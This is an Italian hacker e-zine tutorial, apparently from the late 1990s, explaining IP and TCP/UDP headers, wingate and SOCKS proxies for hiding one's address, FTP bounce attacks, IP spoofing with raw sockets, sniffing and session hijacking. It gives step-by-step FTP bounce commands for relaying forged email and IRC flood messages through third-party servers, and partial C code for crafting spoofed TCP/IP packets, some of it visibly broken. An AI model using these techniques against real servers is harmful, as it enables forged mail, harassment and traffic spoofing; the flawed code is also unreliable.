Daniela (Marilyn Manson non fa skifo...(la musika, intendo)), al gruppo del Timone e a chi mi ritiene malato di mente.... Barzelletta: Fidati, Š un prodotto Microsoft©. ------------------------Indice 0) 1) 2) 3) 4) 5) 6) 7) 8) Disclaima IP TCP & UDP, protocolli Gateways & socks firewalls FTP Bounce Spoofing Sniffing Hijacking Conclusione ------------------------0) Disclaima ATTENZIONE! NON MI ASSUMO UN CACCA DI RESPONSABILITA' PER L'USO CHE FARETE DI QUESTE INFORMAZIONI, QUINDI, C@221 VOSTRI. Inoltre, questo articolo Š scritto da un newbie per una rivista per newbies. Se troverete scontate molte cose da me scritte, abbiate pazienza. Per gli amici del gruppo "IL TIMONE": Queste informazioni mi sono state rivelate dalla Sun Microsystems, che mi sta pagando per fare pubblicit… anti-microsoft (WINDOWS NON CONOSCE I RAW). Inoltre ho scritto questo articolo solo perch‚ Zero e Nobody mi hanno promesso una cospiqua sommetta in cambio. per emailarmi: [email protected] (scherzo ovviamente...) il mio sito web: www.fbi.gov (come sopra) ------------------------1) IP Cos'Š un indirizzo ip? Bene, lo spiego velocemente perch‚ Š bello... allora, avete mai visto quando inserite un sito (ad es. www.microsoft.com) nel vostro browser preferito e premente invio uscire sulla barra dello stato: [Ricerca del sito in corso] [Sito web rilevato (o kualkosa di simile...)] [Connessione a 201.31.26.66] da bravi osservatori? Se no, MALE! :) allora, in questo kaso, ke kosa Š 201.31.26.66? Bene, Š quello l'indirizzo ip... Tutti i computerz in rete hanno un indirizzo ip, anke voi! Infatti, il vostro provider (nota per Eduardo Freni: proVider, e non proVVider, ma che lo leggi anche come sta scritto????) vi assegna un indirizzo ip appena entrate, in modo che anche voi possiate far parte della RETE. Come Š fatto un indirizzo ip? Un indirizzo ip Š un numero a 32 bit suddiviso in 4 blocchi da 8 (se prendiamo 255 in binario diventa 11111111, ma anche 0 da considerare un binario a 8 cifre, cioŠ 00000000, Š inutile che vi dica che ogni cifra corrisponde ad un bit, vero??? :))separati da punti e che spaziano da 0 a 255, ma approposito, i numeri 0 e 255 sono in genere riservati, kuindi si pu• dedurre che vedremo numeri spaziare da 1 a 254... Ora direte(?): ma come si fa da un indirizzo ip numerico a prendere il nome del "proprietario" (il proprietario Š un server, ad es. 66.66.6.6 -> i.am.an.all.american.antichrist) e viceversa? Basta usare il DNS, ovvero il Domain Name Server, che da un ip numerico ricava il nome dell'host e dal nome dell'host ricava l'ip numerico, naturalmente dovete sapere almeno uno di questi due per farvi rivelare l'altro (eheheh, elementare, Wazzon). Inoltre qualsiasi OS che io conosca, prende l'ip 127.0.0.1 come proprio, quindi quando sul nukenabber esce: Un koglione tenta di nukarti sula 139 dall'ip 127.0.0.1, beh, non rispondere al nuke: quel coglione sei tu :) Ma come fa quello che ti nuka a cambiare il suo indirizzo ip con quello locale di ognuno e con altri? Vedremo pi— avanti, ora approfondiamo meglio il concetto di IP non come indirizzo, ma come quello che Š: un INTERNET PROTOCOL. Skemino: 0 15 16 31 ÉÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» Í» º 4 bit º 4 bit º 8 bit TOS º 16 bit Total Lenght º º ºversion ºhead.lenºType of service º In bytes º º ÌÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º º 16 bit º3 bit º 14 bit º º º Identification ºflags º fragment offset º º ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Ì 20 º 8 bit TTL º 8 bit º 16 bit º ºbytes º Time To Live º protocol º Header Checksum º º ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º º 32 bit º º º Source IP Address º º ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º º 32 bit º º º Destination IP Address º º ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ͼ º Options º ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º Data º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Questo Š lo skemino dell'header IP, che si attakka come una sanguisuga su qualsiasi pakketto ke voi mandiate... Cercate di imparare bene codesto skemino (lo trovate dappertutto, pure sul ricettario di nonna Amelia), vi sar… molto utile pi— avanti nella vita (mai quanto le bombe di Jolly Roger :) ------------------------2) TCP e UDP, protocolli Inizio kol dire ke il TCP e l'UDP sono i protocolli di rete pi— diffusi, ma ne esistono anche altri (RAW su tutti: viva lo spoof!). Il TCP Š quello usato da altri protocolli come HTTP, FTP, SMTP ecc ecc. mentre l'UDP Š pi— usato nelle nuke (quelle che vi hanno fatto tanto bestemmiare su Brufolo Bill©). Bisogna dire ke senza TCP il protocollo TCP/IP rimarrebbe IP(ma va'?) e kome tale diventerebbe inaffidabile, cioŠ: io spedisko 20 pakketti ip contenenti un file frammentato ad un altro: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 il protocollo IP non ricordando l'ordine in cui i pacchetti sono stati spediti, facendo arrivare magari cos•: 17 2 20 1 6 10 16 19 8 3 7 13 18 15 4 11 5 9 12 14 o magari 1 5 6 20 Beh? E allora quello kome fa a sapere qual Š il primo pacchetto inviato e quale l'ultimo? O peggio... Š arrivato il pakketto? Non pu• funzionare un ftp cos•! Ma se noi attakkassimo un pakketto tcp ad un header ip??? Ecco l'header TCP (AAARGH! UN'ALTRA TABELLA!!!): ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» Í» º 16 bit º 16 bit º º º Source Port Number º Destination Port Number º º ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º º 32 bit º º º SEQence Number º º ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º º 32 bit º Ì 20 º ACKnowledgement Number º ºbytes ÌÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º º4 bit º 6 bit º 6 bit º 16 bit º º ºHead.Lenº Reserved º Flags º Window size º º ÌÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º º 16 bit º 16 bit º º º Checksum º Urgent pointer º º ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ͼ º Options º ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º Data º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Bene, combinato all'ip dovremmo avere: min. 20 bytes di header IP + min. 20 bytes di header TCP + data, ma bisogna considerare che un pacchetto TCP/IP non pu• superare la soglia dei 65535 bytes (vi ricordate il Ping Of Death???). Ora, torniamo al problema dell'ordine dei pakketti: avete visto quel sequence number (ho evidenziato SEQ perch‚ in molti sniffer Š per brevit… cos• mostrato, poi vedremo pi— avanti)? Bene, con il sequence number il ricevente sapr… benissimo quale pakketto viene prima e quale dopo. L'ACK Š in vece il riconoscimento, ed Š dato dal precedente SEQ del ricevente + il numero di bytes che questi ha inviato, mentre il SEQ Š il precedente ACK del ricevente... ke kasino, vero? Comunque vi ci abituerete... (io ancora non mi ci sono abituato). Bene, il discorso kambia quando si stabilisce una connessione. Chiamiamo un client A, un server B: A--->B SEQ:1118358509 ACK:0 B--->A SEQ:4143819233 ACK:1118358510 A--->B SEQ:1118358510 ACK:4143819234 (NUMERI PRESI DALL'ARTICOLO DI FuSyS, Progetto 0N0S3NDAi, BFi no.4 :)) Questo processo Š chiamato 3-Way Handshake, A manda un SEQ a B, ACK naturalmente 0, B risponde con un suo SEQ e con l'ACK di A incrementato di 1, ed A per confermare risponde con come SEQ l'ACK di B, e come ACK il SEQ di B+ 1, tutto chiaro? (a me no...) E da qui inizia la comunicazione. Per il protocollo UDP, kambia kualkosa... Il protocollo UDP infatti non stabilisce di una connessione, come il TCP, ha un header pi— pikkolo ed Š leggermente pi— veloce... Volete un'altra tabella? Mi dispiace, ma momentaneamente non dispongo di schemi di pacchetti UDP, cos• cercher• di riassumere testualmente. Un pacchetto UDP Š cos• composto: 16 bit source port, destination port, 16 per header lenght + reserved + flags e 16 per il checksum. NB: per i bit mi sono basato sul fatto che erano shorts, il che vuol dire intero a 16 bit, da 0000 a FFFF (0 a 65535) (il numero massimo di porte), il checksum Š di 16 sicuramente, mentre non sono sicuro per la lunghezza: Š solo quella dello header o Š di tutto il pacchetto??? Dovrebbe essere a 16 bit, essendo uno short, ma negli altri protocolli l'header lenght Š di 4... Vabb‚, nel prossimo numero cercher• di mandarvi la risposta... 8( Ora, tralasciando l'UDP (se non volete spoofare per nukare kualkuno non ve ne importer… pi— di tanto), sappiamo che il Source Address (indirizzo sorgente) Š nell'intestazione IP, mentre la Source Port Š nella TCP giusto? Vedremo pi— avanti (vedi SPOOFING) come si mandano pacchetti spoofati. Ed ora, se non volete che nessuno sappia il vostro vero IP su IRC, ecco i... ------------------------3) Gateways & socks firewalls Cosa Š un gateway? Qualcuno sul numero 3 di Newbies aveva detto: Mettiamo che Gambadilegno voglia insultare Topolino, senza per• fargli sapere di essere stato lui, cosa fa? Va da Pippo (il pi— scemo) e gli dice: senti, vai da Topolino e digli: "@'^!##" (o qualcosa di simile (non ricordo)) e dimmi cosa ti risponde. Allora Pippo, che Š molto idiota, va da Topolino e gli dice: "@'^!##" (rimango nell'incertezza tuttora). Topolino allora gli risponde: "Senti Pippo, io sono sempre molto calmo e tranquillo, ma se mi dici queste cose alla fine mi farai arrabbiare..." Pippo, che non ha capito nemmeno cosa ha detto Topolino, torna da Gambadilegno e gli dice (per emulazione dei suoni) quello che gli ha detto Topolino. Vedete, prendiamo come Gambadilegno il client A, come Pippo un server dotato di wingate, chiamato B, e come Topolino un altro server, magari tin.it, tale C. Allora, una volta che A si connette a B (in genere sulla 8080), si trover… davanti il prompt: Wingate> Che pu• fare? Vi konnettete da qui ad un altro server e l'ip loggato sar… quello del wingate o netgate (o stargate ;)) che dir si voglia... Un socks invece firewall come si usa? Il firewall Š usato in genere per connettersi ad IRC da un ip non proprio (pi— o meno per lo stesso skopo dei gateways...) e mandare a 'ffanculo tutti coloro che tenteranno di nukare un server... Per utilizzarlo prendiamo il nostro klient IRC di fiducia (mIRC, usato dalla maggioranza), andiamo ad Options->Firewall e selezioniamo "Use socks Firewall" come host ci mettiamo il Server B e come socks va bene anche il 4, port la porta, et ual… (oddio...), il gheim est fatto (sono un poliglotta), nel senso che potete benissimo clickare su Connect, e i vostri messaggi "rimbalzeranno" prima sul server B e poi arriveranno a C, quindi, se uno vi fa un DNS, al massimo vi fotte il firewall ;) Come avrete intuito (spero, altrimenti ve lo spiego io), il passaggio pi— difficile Š TROVARE il server B. Esistono appositi scanner per Wingate, mentre se volete un firewall e se proprio non volete perdere tempo andate su un canale warez o per pedofili (maledetti!) & co., vedete le mask degli users, e almeno uno di essi sar… un paranoico che per non essere bekkato entra in quei canali usando un firewall... Chiaro il concetto???? Bene, ora vedremo come fare altri skerzetti di questo tipo con una tecnica "rivelatami dalla Sun" ( :))) detta... ------------------------4) FTP Bounce Bene, sapete tutti cosa Š un ftp, vero? Occorre dire (almeno ad alcuni non proprio bravi con l'inglese) che bounce vuol dire "rimbalzo". Rimbalzo FTP? Cos'Š, si mangia? No. Avete un ftp uploadabile? EHEHEH, SAPETE COME SI RITIRANO I FILES? Vabb‚, iniziamo dall'inizio (urka...) Quando un ftp trasmette un file ad un computer remoto, lo fa in base all'ip e alla porta specificata previamente. Non avete mai visto un client ftp in funzione? (se no, perch‚ cavolo leggete questo articolo??? :)) Se Š un client munito di status-bar o ke vi fa vedere i comandi, quando ritirerete un file vedrete: PORT xxx,xxx,xxx,xxx,y,z dove le x sono il vostro indirizzo IP (intervallato per• da ',' e non da '.'), mentre la y Š un numero che non ci interessa, e la z Š la porta sulla quale il client si appresta a ricevere il file. Dopodicch‚ vedrete il comando RETR xxxxxxxx dove xxxxxxxx Š il nome del file che volete ritirare. Il comando PORT serve a dire al server a quale host:porta deve sendare il file, ed il client ftp lo usa per dare il nostro ip e la nostra porta. Ma se noi usassimo ad esempio: PORT 111,222,33,44,0,21 RETR Goofyfuckedbymickey.jpg che accadrebbe???? Semplice, il server ftp anzikk‚ mandare a noi il file, lo manda all'host 111.222.33.44 sulla porta 21 (ftp, ma si possono usare anche altre porte), cos• il file Goofyfuckedbymickey.jpg (eheheh, come mi Š venuto 'sto nome???) verr… copiato anche sull'ftp 111.222.33.44 (certi files sono imperdibili :) ) (anzi, non verr… copiato perch‚ ci vuole user e pass e stor ecc...). Se siete abbastanza makkinosi avrete gi… capito quali siano le cosette che si possono fare con questo stratagemma. Comunque, continuate a leggere. Se voleste mandare una fakemail a qualcuno (suppongo che sappiate come si faccia, ma in caso contrario i comandi sono commentati) senza che il vostro ip compaia minimamente nella suddetta, bene, allora potete fare cos•: create un nuovo file contenente i comandi per l'SMTP (server che invia posta), ad esempio: HELO ftpvittima.com [saluta l'SMTP identificandosi come il server che usate per bounciare] MAIL FROM: <[email protected]> [imposta l'indirizzo mail mittente come quello che ci mettete fra le <>] RCPT TO: <[email protected]> [indirizzo del ricevente] DATA [inizio del corpo della mail] [tutte le cose che ci vanno, gli headers, ecc.] Muori lamerone! . [un punto su riga vuota termina il data] QUIT [quitta dall'smtp] bene, ed ora in teoria si potrebbe mandare all'smtp via bounce, ma Š di regola incrementare le dimensioni del file a circa 60 kilobytes, per non far cadere inspiegabilmente la connessione... per fare ci• editate un file contenente 60000 spazi (provateci...) oppure utilizzate il debug in questo modo: [NOI] C:\>debug nomedelfileconi60000spazi [PC] File non trovato [NOI] -f 100,F000,0 [NOI] -rcx [PC] :0000 [NOI] -EA60 [NOI] -w [PC] Scrittura di EA60 bytes in corso... [NOI] -q bene, dovremmo aver creato un file chiamato nomedelfileconi60000spazi lungo all'incirca 60k e pieno di " " (spazi). ora si fa un copy /b filedeicomandi+nomedelfileconi60000spazi cmds et voil…! Ecco il file cmds lungo 60k ma con i comandi all'interno. Ed ora, come utilizzare questo file??? 1) Prendete il vostro client ftp preferito e mettete sul server vittima il file "cmds" o come l'avete chiamato (naturalmente il server deve essere uploadabile...) 2) Prendete il vostro client telnet preferito e connettetevi al server vittima sulla porta 21 (ftp). 3) Ora scrivete PORT xxx,xxx,xxx,xxx,0,25 (le x sono l'indirizzo ip del server mail, se non lo sapete allora fate un DNS, mentre 25 Š per SMTP, lo 0 lo lasciate cos•) 4) Ed infine RETR cmds (fa inviare all'ftp il file cmds all'indirizo e alla porta specificate con PORT) Che succede? L'ftp si connette al server SMTP e gli inizia a mandare il file cmds e l'smtp prende i caratteri ascii esattamente come se fosse un telnet o un client per e-mail ad inviarli. Volete un altro esempio??? Editate un file contenente: USER Pippo NICK Pippo PRIVMSG Topolino :@'^!## @'^!## @'^!## @'^!## @'^!## @'^!## @'^!## @'^!## L'ultima riga dovete ripeterla pi— volte... Oppure se conoscete bene i comandi IRC potete fare molte altre cosette, questa serve solo a far dire a Topolino la parola @'^!## ripetutamente da Pippo, che Š il nostro ftp di fiducia :) Nulla ci vieta di floodarlo di DCC o di mandargli ping in continuazione... Per• fate 'ste cose solo in casi veramente necessari Comunque, aggiungete i soliti 60k, inviate al server e con il solito procedimento (PORT 194,243,155,43,0,6666 per connettervi a irc.tin.it sulla 6666 e poi RETR nomedelfileconicomandi) e tutto funzioner… (se non avete sbagliato niente o se non ho sbagliato niente io .. :P). NOTA IMPORTANTISSIMA LEGGETELA: In alcuni casi pu• essere meglio utilizzare il comando: quote "port xxx,xxx,xxx,xxx,y,z" invece di PORT solamente. Vi ho avvisati, chiaro????? Ok, ok, bello sto ftp bounce, ma come cacca si fa a vedere le risposte? Non si pu•, l'ftp Š quel che si pu• definire un attacco cieco. Ma ora vediamo lo... ------------------------5) Spoofing Lo spoofing Š una tecnica che ci permette di inviare pacchetti di qualsiasi genere che sembrano provenire da un determinato indirizzo quando invece vengono da tuttaltra parte... Provate a nukare qualke rompikollo dall'ip di fbi.gov (eheheh). Comunque non voglio trattare di nukes et similia, ma cercher• di illustrarvi i diversi tipi di attacco spoofato. Ci sono due tipi di attacchi: quelli "ciechi" e quelli che ci permettono di vedere le risposte, "sniffando" dal server vittima all'ip che usiamo per spofare. Come si fa a mandare un pacchetto spoofato? Beh, ci sono modi e modi. Da Unix & Company Š molto facile: basta creare un socket RAW (un socket *molto* grezzo) e lavorarlo mettendoci sopra degli header IP e TCP (ma anche UDP o ICMP) non standard, cioŠ come quelli che si trovano nelle librerie net*. Infatti, nel nostro header IP dovremmo mettere anche l'ip del mittente, cosa che invece con le normali funzioni di sending viene automaticamente fatta dal protocollo usato. In principio si crea un bell'header ip tipo: struct ipheader { unsigned char verlen, tos; //versione+lunghezza header, tipo unsigned short lenght, identification, flageoffset; //lunghezza, id, flags+offset unsigned char ttl, protocol; //time to live, protocollo utilizzato unsigned long int source, destination; //indirizzo ip sorgente, destinazione }; ecco, bello vero? Se esaminate attentamente vedrete: * un char (8 bit) che include sia la versione ip che la lunghezza dello header (contenitori a 4 bit non li so trovare io in c...) * un char (8 bit) per il tipo di servizio (TOS) * uno short (16 bit) per la lunghezza, uno per l'identificazione e uno che include i 3 bit dei flag e i 13 del fragment offset * un altro char per il time to live, ovvero su quanti server pu• passare prima di fermarsi * un altro char che identifica il protocollo * due long (32 bit) che identificano l'ip sorgente e quello di destinazione bene, non Š uguale allo skemino del cap. 1? Per agevolarci ora creeremo uno pseudo ip header: struct pseudoipheader { unsigned long int source, destination; char byte_zero, protocol; unsigned short TCP_UDP_lenght; }; qui abbiamo l'ip sorgente, destinazione, il byte zero, il protocollo utilizzato e la lunghezza del tcp o dell'udp. Ora veniamo ai protocolli TCP e UDP: struct tcpheader { unsigned short source, destination; unsigned long int seq, ack; unsigned short offset_flags, window, checksum, urgent; }; da notare che i source e i destination sono non degli indirizzi, ma delle porte (short a 16 bit), qui dovete mettere la porta sorgente e quella destinazione, insomma. Poi c'Š il SEQ e l'ACK, interi a 32 bit, e infine abbiamo l'header lenght + reserved + flags, window, il checksum e l'urgent pointer. Ecco qui anche quello dell'udp, giusto per facilitarvi la vita :) struct udpheader unsigned short } Tutto chiaro no? anche questo per { source, destination, lenght, checksum; E per finire si crea uno struct di scambio di dati spoofati, facilitarci la vita... struct spdataexchange { int fd; char *data; int datalen; char *source; unsigned short sourceport; char *destination; unsigned short destinationport; unsigned long seq, ack; unsigned short flags; char *buffer; int ip_optlen, tcp_optlen; } In questo struct copieremo i dati ip e tcp e tutto il resto, per poi scriverlo sul pacchetto da inviare... Ora, come facciamo ad inviare un pacchetto??? Creeremo una funzione detta sendsppacket: void sendsppacket(struc spdataexchange *sp, unsigned char protcollo) { int sp_status; struct sockaddr_in *sp_serv; struct hostent *sp_help; int HEADER_BASE; bzero((char *)&sp_serv, sizeof(struct sockaddr)); sp_serv.sin_family = AF_INET; sp_serv.sin_addr.s_addr = inet_addr(sp->destination); if(sp_serv.sin_addr.s_addr==(unsigned int)-1) { if(!(sp_help=gethostbyname(sp->destination))) fprintf(stderr,"unknown host %s\n",sp->destination), exit(1); bcopy(sp_help->h_addr,(caddr_t)&sp_serv.sin_addr,sp_help->h_lenght); } switch(protocollo) { case TCP: HEADER_BASE = TCP_HEADER_BASE; break; //Spiego sotto questi passaggi case UDP: HEADER_BASE = UDP_HEADER_BASE; break; case default: exit(1); break; } sp_status = sendto(sp->fd, (char *)sp->buffer, sp->datalen+HEADER_BASE+ IP_HEADER_BASE+sp->ip_optlen, 0, (struct sockaddr *)&sp_serv, sizeof(struct sockaddr)); if((sp_status < 0) || (sp_status!=sp->datalen+HEADER_BASE+IP_HEADER_BASE+sp->ip_optlen)) { if(sp_status < 0) perror("sendto()\n"), exit(1); printf("Trasmessi soltanto %d bytes di %d\n", sp_stat, sp->datalen+HEADER_BASE+IP_HEADER_BASE+sp->ip_optlen); } } Bene, con questa funzione mandiamo i pacchetti che abbiamo creato... Dopo i procedimenti di routine si tenta di risolvere l'host di destinazione, se non si riesce si esce (splendido gioco di parole...), se invece l'host esiste si copia nel "sp_serv.sin_addr". Poi si vede il protocollo: TCP e UDP ve li definite prima con #define (TCP 6 e UDP 17), se Š tcp l'header_base sar… ovviamente la lunghezza della dimensione minima dell'header tcp(20), se Š udp quella dell'udp (8) e se Š altro esce :), l'ip Š 20. Poi si manda il pacchetto spoofato realizzato prima, e si vede se il risultato Š positivo o meno, quanti bytes sono stati inviati, eccetera. La lunghezza naturalmente Š la lunghezza dei dati+l'HEADER_BASE definito prima+la lunghezza dell'header ip (20) + la lunghezza delle opzioni ip. 500 righe! Uff! Che fatica... Dovremmo esserci... Per fixare i vostri header IP e TCP, ci sono due pratiche(ALLA FACCIA!) funzioni: void sp_fix_IP_packet(struct spdataexchange *sp, unsigned char protocollo) { struct ipheader *sp_help_ip; int HEADER_BASE; switch(protocollo) { case TCP: HEADER_BASE = TCP_HEADER_BASE; break; case UDP: HEADER_BASE = UDP_HEADER_BASE; break; case default: exit(1); break; } sp_help_ip = (struct ipheader *)sp->buffer; sp_help_ip->verlen = (IP_VERSION << 4) | (IP_HEADER_BASE+sp->ip_optlen+sp->tcp_optlen); sp_help_ip->tos = 0; sp_help_ip->lenght = htons(IP_HEADER_BASE+HEADER_BASE+sp->ip_optlen+sp->tcp_optlen+sp->datalen); sp_help_ip->ID = htons(12545); sp_help_ip->flageoffset=0; sp_help_ip->ttl = 69; //miseria! Non deve morire prima del previsto... sp_help_ip->protocol = protocollo; sp_help_ip->source = sp_getaddrbyname(sp->source); sp_help_ip->destination = sp_getaddrbyname(sp->destination); sp_help_ip->checksum = in_cksum((unsigned short *) (sp->buffer), IP_HEADER_BASE+sp->ip_optlen); } Questa Š per l'ip... Š molto intuitiva, Š inutile che ve la spieghi. Attenzione, la funzione sp_getaddrbyname(char *) non ve la scrivo, ve la spiego brevemente: usate un HOSTENT, nel caso in cui l'host debba andare risolto. Se l'host Š gi… numerico, si verifica l'esistenza e si ritorna il valore long della medesima. Se invece non Š numerico, tentiamo di risolverlo e se ci riusciamo si pu• benissimo ritornare il valore long dell'host, altrimenti si da come risultato 0. Per fixare l'header TCP: void sp_fix_TCP_packet(struct spdataexchange *sp) { char *pseudo_ip_construct[1500]; struct tcpheader *sp_help_tcp; struct pseudoipheader *sp_help_pseudo_ip; int i; for(i=0;i<1500;i++) pseudo_ip_construct[i]=0; sp_help_tcp = (struct tcpheader *) (sp->buffer+IP_HEADER_BASE+sp->ip_optlen); sp_help_pseudo_ip = (struct pseudoipheader *) pseudo_ip_construct; sp_help_tcp->offset_flags = htons((((TCP_HEADER_BASE+sp->tcp_optlen)/4)<<12) | sp->flags); sp_help_tcp->seq = sp->seq; sp_help_tcp->ack = sp->ack; sp_help_tcp->source = htons(sp->sourceport); sp_help_tcp->destination = htons(sp->destinationport); sp_help_tcp->window = htons(0x7c00); sp_help_pseudo_ip->source = sp_getaddrbyname(sp->source); sp_help_pseudo_ip->destination = sp_getaddrbyname(sp->destination); sp_help_pseudo_ip->zero_byte = 0; sp_help_pseudo_ip->protocol = TCP; sp_help_pseudo_ip->TCP_UDP_lenght = htons(sp->datalen+TCP_HEADER_BASE+sp->tcp_optlen); memcpy(pseudo_ip_construct+12,sp_help_tcp,sp->datalen+TCP_HEADER_BASE+sp->optlen ); sp_help_tcp->checksum = in_cksum((unsigned short *)pseudo_ip_construct, sp->datalen+12+TCP_HEADER_BASE+sp->tcp_optlen); } Ecco qua! Ultimo appunto: la in_cksum Š una funzione che potete trovare dappertutto, anche sul ping.c o su uno dei vari nuker... Non mi dilungo anche sull'UDP (ma questa Š discriminazione razziale! :)), anche perch‚ se conoscete bene il C (spero, altrimenti che avete fatto, avete letto fin qua senza capire un c***o???) Š molto intuitiva da realizzare... Se rimanete nel dubbio, per•, leggetevi i sorgenti di spoofit.h, una libreria che mi ha ispirato non poco. Non ricordo il nome dell'autore, un attimo... Ah, si: Bretch Claerhout. NOTICINA: se non vi va di scrivervi gli header ip, tcp e/o udp a da soli, li potete semplicemente aggiungere queste righe all'inizio del codice :) #include <netinet/ip.h> #include <netinet/tcp.h> #include <netinet/udp.h> //contiene lo struct per lo header ip //contiene quello per il tcp //e quello per l'udp ma se ve l'avessi detto prima avreste potuto comprendere come Š formato un header ip??? Bene, ora, se avete imparato a spoofare, vi chiederete: come si fa a vedere le risposte che ci manda l'host vittima??? Dobbiamo fare tutto a caso? Beh, in effetti se sapete prevedere bene le risposte del server potreste farlo, ma esiste un'altra tecnica, per leggere dei pacchetti non propriamente destinati a noi... Ecco a voi lo ------------------------6) Sniffing Non mi dilungo molto sullo sniffing. C'Š per• da dire che sniffare un pacchetto Š diverso che sniffare cocaina ed ha risultati meno disastrosi (a meno che non sniffiate un pacchetto di cocaina :D ). Se volete approfondire questa tecnica, vi consiglio di leggervi sia la spoofit di Bretch Claerhout che il file sniffit.c, i sorgenti dello sniffer sempre del suddetto. Oppure vi consiglio di prokurarvi uno sniffer preconfezionato, tanto cercando su astalavista.box.sk avrete solo l'imbarazzo della scelta... Lo sniffing opera solo su reti ethernet, quindi non pensate di mettervi a sniffare fbi.gov se non siete nella sua subnet... Se prendete uno sniffer, potrete avere risultati simili 100.100.100.2 > 100.100.100.1 (TTL:255, Window:255) SEQ:1233156198 ACK:0 Flags: -S---- 100.100.100.2 < 100.100.100.1 (TTL:255, Window:511) SEQ:2444444444 ACK:1233156199 Flags: -S--A- 100.100.100.2 > 100.100.100.1 (TTL:255, Window:91925) SEQ:1233156200 ACK:2444444445 Flags: ----A- (numeri a cavolo a parte, lo skema può variare leggermente da Sniffer a sniffer) in questo caso Š sempre il 3 way handshake... Comunque, lo sniffing pu• essere combinato allo spoofing per ottenere l' ------------------------7) Hijacking Hijacking Š un termine coniato durante il proibizionismo in america che consisteva nel rapinare i contrabbandieri di alcoolici. Sul mio vocabolario c'Š scritto anche: Rapinare, fare il doppio gioco. Ora, tralasciando le origini del termine, che cosa Š oggi l'hijacking??? Mettiamo che voi vi connettiate ad un host da un ip spoofato, e poi che sniffiate le risposte che l'host manda all'ip che avete scelto voi per spoofare. Bene, questo Š hijacking. Anche qui non mi dilungo molto, visto che c'Š sempre il buon vecchio Astalavista e poi nell'articolo di Bretch sullo spoofing c'Š, oltre ai sorgenti della spoofit, anche un telnet hijacker, se non mi sbaglio. Bene, sono giunto alla ------------------------8) Conclusione Spero di avervi delucidato un po le idee sull'argomento masquerading/spoofing (che, ahinoi, al giorno d'oggi molti prendono per la stessa cosa), se ci sono errori vi prego di segnalarmeli (non errori di ortografia, naturalmente :)) e cercher• di mandare un errata corridge. Naturalmente le cose che ho detto sulla Microsoft© e sulla Sun Microsystem© spesso sono esagerazioni (anzi, sempre), anche perch‚ io uso linux solo quando devo fare sniff e spoof, ma per il resto uso sempre Windows 98, che Š molto 